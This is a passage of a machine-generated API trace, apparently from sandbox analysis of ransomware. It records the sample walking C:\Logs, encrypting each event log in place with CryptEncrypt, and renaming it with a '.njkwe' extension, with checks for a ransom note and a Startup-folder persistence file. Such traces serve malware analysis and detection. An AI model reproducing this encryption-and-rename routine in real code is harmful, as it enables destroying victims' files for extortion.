(lpFirst="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpSrch=".njkwe") returned 0x0 [0066.714] lstrcmpW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.714] lstrcmpW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="taridd") returned -1 [0066.714] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.715] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.715] GetTickCount () returned 0x1151133 [0066.715] GetTickCount () returned 0x1151133 [0066.715] GetTickCount () returned 0x1151133 [0066.715] GetTickCount () returned 0x1151133 [0066.715] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.715] GetProcessHeap () returned 0xbe0000 [0066.715] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.715] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.717] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.717] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.717] GetProcessHeap () returned 0xbe0000 [0066.717] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.717] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.717] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.717] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.717] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.717] CloseHandle (hObject=0x428) returned 1 [0066.719] GetProcessHeap () returned 0xbe0000 [0066.719] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.719] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0066.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.720] GetProcessHeap () returned 0xbe0000 [0066.720] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.720] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0066.720] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="Windows") returned -1 [0066.720] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.720] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.720] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="Program Files") returned -1 [0066.720] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.720] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 58 [0066.720] StrStrIW (lpFirst="Microsoft-Windows-Shell-Core%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.720] lstrcmpW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.720] lstrcmpW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="taridd") returned -1 [0066.720] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.720] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.721] GetTickCount () returned 0x1151133 [0066.721] GetTickCount () returned 0x1151133 [0066.721] GetTickCount () returned 0x1151133 [0066.721] GetTickCount () returned 0x1151133 [0066.721] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.721] GetProcessHeap () returned 0xbe0000 [0066.721] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.721] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.722] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.723] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.723] GetProcessHeap () returned 0xbe0000 [0066.723] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.723] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.723] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.723] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.723] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.723] CloseHandle (hObject=0x428) returned 1 [0066.725] GetProcessHeap () returned 0xbe0000 [0066.725] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.725] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 78 [0066.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.726] GetProcessHeap () returned 0xbe0000 [0066.726] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.726] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0066.726] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="Windows") returned -1 [0066.726] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="$Recycle.bin") returned 1 [0066.726] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="System Volume Information") returned -1 [0066.726] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="Program Files") returned -1 [0066.726] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="Program Files (x86)") returned -1 [0066.726] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 58 [0066.726] StrStrIW (lpFirst="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpSrch=".njkwe") returned 0x0 [0066.726] lstrcmpW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.726] lstrcmpW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="taridd") returned -1 [0066.726] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.726] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.726] GetTickCount () returned 0x1151133 [0066.726] GetTickCount () returned 0x1151133 [0066.726] GetTickCount () returned 0x1151133 [0066.726] GetTickCount () returned 0x1151133 [0066.726] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.726] GetProcessHeap () returned 0xbe0000 [0066.726] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.727] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.792] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.792] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.792] GetProcessHeap () returned 0xbe0000 [0066.792] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.792] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.792] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.793] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.793] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.793] CloseHandle (hObject=0x428) returned 1 [0066.795] GetProcessHeap () returned 0xbe0000 [0066.795] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.795] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx_r00t_{3sXlE5}.njkwe") returned 78 [0066.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.796] GetProcessHeap () returned 0xbe0000 [0066.796] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.796] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0066.796] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="Windows") returned -1 [0066.796] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.796] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.796] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="Program Files") returned -1 [0066.796] lstrcmpiW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.796] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 57 [0066.796] StrStrIW (lpFirst="Microsoft-Windows-SMBClient%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.796] lstrcmpW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.796] lstrcmpW (lpString1="Microsoft-Windows-SMBClient%4Operational.evtx", lpString2="taridd") returned -1 [0066.796] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.796] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.796] GetTickCount () returned 0x1151181 [0066.796] GetTickCount () returned 0x1151181 [0066.796] GetTickCount () returned 0x1151181 [0066.796] GetTickCount () returned 0x1151181 [0066.796] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.797] GetProcessHeap () returned 0xbe0000 [0066.797] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.797] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.800] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.800] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.800] GetProcessHeap () returned 0xbe0000 [0066.800] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.800] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.800] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.801] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.801] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.801] CloseHandle (hObject=0x428) returned 1 [0066.803] GetProcessHeap () returned 0xbe0000 [0066.803] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.803] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 77 [0066.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.804] GetProcessHeap () returned 0xbe0000 [0066.804] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.804] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0066.804] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="Windows") returned -1 [0066.804] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="$Recycle.bin") returned 1 [0066.804] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="System Volume Information") returned -1 [0066.804] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="Program Files") returned -1 [0066.804] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="Program Files (x86)") returned -1 [0066.804] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 54 [0066.804] StrStrIW (lpFirst="Microsoft-Windows-SmbClient%4Security.evtx", lpSrch=".njkwe") returned 0x0 [0066.804] lstrcmpW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.804] lstrcmpW (lpString1="Microsoft-Windows-SmbClient%4Security.evtx", lpString2="taridd") returned -1 [0066.804] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.804] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.805] GetTickCount () returned 0x1151181 [0066.805] GetTickCount () returned 0x1151181 [0066.805] GetTickCount () returned 0x1151181 [0066.805] GetTickCount () returned 0x1151181 [0066.805] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.805] GetProcessHeap () returned 0xbe0000 [0066.805] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.805] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.807] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.807] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.807] GetProcessHeap () returned 0xbe0000 [0066.807] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.807] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.808] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.808] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.808] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.808] CloseHandle (hObject=0x428) returned 1 [0066.813] GetProcessHeap () returned 0xbe0000 [0066.813] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.813] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: 